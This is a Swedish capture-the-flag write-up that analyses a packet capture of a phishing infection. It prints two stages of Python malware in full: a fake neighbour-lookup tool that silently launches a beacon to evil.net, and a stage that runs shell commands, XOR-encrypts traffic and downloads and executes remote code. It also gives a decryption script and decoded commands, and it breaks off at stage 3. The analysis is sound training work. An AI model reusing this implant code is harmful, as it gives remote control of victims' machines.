Grannupplysningen

172.23.0.3 är Anders IP

I frame 64 öppnas mailet som innehåller länkar till malware (upplysning.py)

I frame 108 laddas malware ner och i frame 112 kan vi se hela python scriptet

def main():
    print('V..lkommen till Grannupplysningen!')
    name = input('Ange ditt namn: ')
    input('Ange din adress: ')
    input('Ange din postadress: ')
    print('Kunde inte hitta n..gra grannar f..r %s! F..rs..k igen senare.' % name)


def payload():
    import requests
    import time
    import subprocess
    import urllib.parse
    import gzip
    
    session = requests.session()

    while True:
        response = session.get('http://evil.net/beacon_1').json()
        
        if response['command'] == 'sleep':
            time.sleep(response.get('parameters', [3])[0])

        elif response['command'] == 'shell':
            output = subprocess.check_output(response.get('parameters')[0], shell=True)
            session.post('http://evil.net/shell_1', json={'output': urllib.parse.quote(output, safe='')})

        elif response['command'] == 'download_and_execute':
            new_payload = session.get(response.get('parameters')[0]).content
            session_id = session.cookies['id']
            exec(new_payload, globals(), locals())
            break


if __name__ == '__main__':
    if '--payload' in sys.argv:
        payload()
    else:
        os.system('python3 %s --payload &> /dev/null &' % sys.argv[0])
        main()

Sen ser man hur Anders dator börjar pinga /beacon_1 för att få instruktioner.

Till en början får han bara tillbaka sleep men i frame 311 så skickar servern kommandot: whoami

Anders dator svarar med Anders%0A (Anders + newline)

Sen fortsätter beacon svara med sleep fram tills frame 385 där stage_2 börjar:

Här är python-koden för stage_2 (finns i tcp stream 24)

def entrypoint(session_id):
    import uuid
    import base64
    import requests
    import json
    import subprocess
    import time
    import marshal

    key = uuid.getnode().to_bytes(length=6, byteorder='big')
    
    session = requests.session()
    session.cookies.set('id', session_id)
    
    session.post('http://evil.net/set_key', json={'key': base64.b64encode(key).decode()})
    
    while True:
        data = base64.b64decode(session.get('http://evil.net/beacon_2').content)
        response = json.loads(rolling_xor(data, key).decode())
        
        if response['command'] == 'sleep':
            time.sleep(response.get('parameters', [3])[0])

        elif response['command'] == 'shell':
            output = subprocess.check_output(response.get('parameters')[0], shell=True).decode()
            output_encrypted = rolling_xor(json.dumps({'output': output}).encode(), key)
            session.post('http://evil.net/shell_2', data=base64.b64encode(output_encrypted))

        elif response['command'] == 'download_and_execute':
            new_payload = session.get(response.get('parameters')[0]).content
            session_id = session.cookies['id']
            exec(marshal.loads(rolling_xor(new_payload, key)), globals(), locals())
            break


entrypoint(session_id)

Några highlights här är att den använder en XOR funktion för att kryptera/obfuskera trafik eller meddelanden. Den nyckeln baseras på datorns MAC-address och den skickas till C2 servern här:

session.post('http://evil.net/set_key', json={'key': base64.b64encode(key).decode()})

Därefter börjar huvudloopen som liknar det första scriptet (upplysning.py) med den skillnaden att här används XOR för obfuskering.

Tittar vi vidare på trafiken så ser vi att nyckeln skickas i fram 407 och den är "AkKsFwAD". Den kommer hjälpa oss att dekryptera XOR-strängarna vi förmodligen kommer se snart.

Nedan är ett python script som använder nyckeln och dekrypterar strängar.

import base64

def xor_rolling(data: bytes, key: bytes) -> bytes:
    """Utför XOR med upprepad nyckel."""
    out = bytearray()
    klen = len(key)
    for i, b in enumerate(data):
        out.append(b ^ key[i % klen])
    return bytes(out)

while True:

    data_b64 = input("Data att dekryptera (Base64): ").strip()
    if data_b64.lower() == "exit":
        break

    try:
        key = base64.b64decode("AkKsFwAD")
        data = base64.b64decode(data_b64)
    except Exception as e:
        print("Fel: kunde inte Base64-avkoda. Försök igen.\n")
        continue

    decoded = xor_rolling(data, key)

    try:
        print("→ Dekrypterat (text):", decoded.decode(), "\n")
    except UnicodeDecodeError:
        print("→ Dekrypterat (bytes):", decoded, "\n")

Testar vi den på frame 423 som är ett svar på GET /beacon_2 så får vi:

0x41p@thinkpad:~/Downloads/upplysning_FRA$ python3 xor.py 
Data att dekryptera (Base64): eWDPeG1uYyzINTojIDHAcmVzID8=
→ Dekrypterat (text): {"command": "sleep"}

Gräver vi vidare i pcap filen och letar efter krypterade strängar så hittar vi den första som inte är sleep i frame 495.

Frame 495
→ Dekrypterat (text): {"command": "shell", "parameters": ["ls /home/anders"]}

Frame 505
→ Dekrypterat (text): {"output": "Desktop\nDocuments\nDownloads\nMusic\nPictures\nPublic\nTemplates\nVideos\n"}

Frame 545
→ Dekrypterat (text): {"command": "shell", "parameters": ["ls -al /home/anders/Documents"]}

Frame 555 (hemligheter.png)
→ Dekrypterat (text): {"output": "total 148\ndrwxrwxr-x  2 anders anders   4096 Dec 14 14:41 .\ndrwxrwxr-x 15 anders anders   4096 Dec 19 12:57 ..\n-rw-rw-r--  1 anders anders 141523 Dec 14 14:34 hemligheter.png\n"}

Frame 583
→ Dekrypterat (text): {"command": "shell", "parameters": ["python3 -V"]}

Frame 597
→ Dekrypterat (text): {"output": "Python 3.9.2\n"}

Frame 729 (Dags för stage 3)
→ Dekrypterat (text): {"command": "download_and_execute", "parameters": ["http://evil.net/stage_3"]}

På rad 741 så kommer en binär. Förmodligen en python binär?

To be continued!

PreviousFRA Challenges NextHack The Box Challenges

Last updated 1 month ago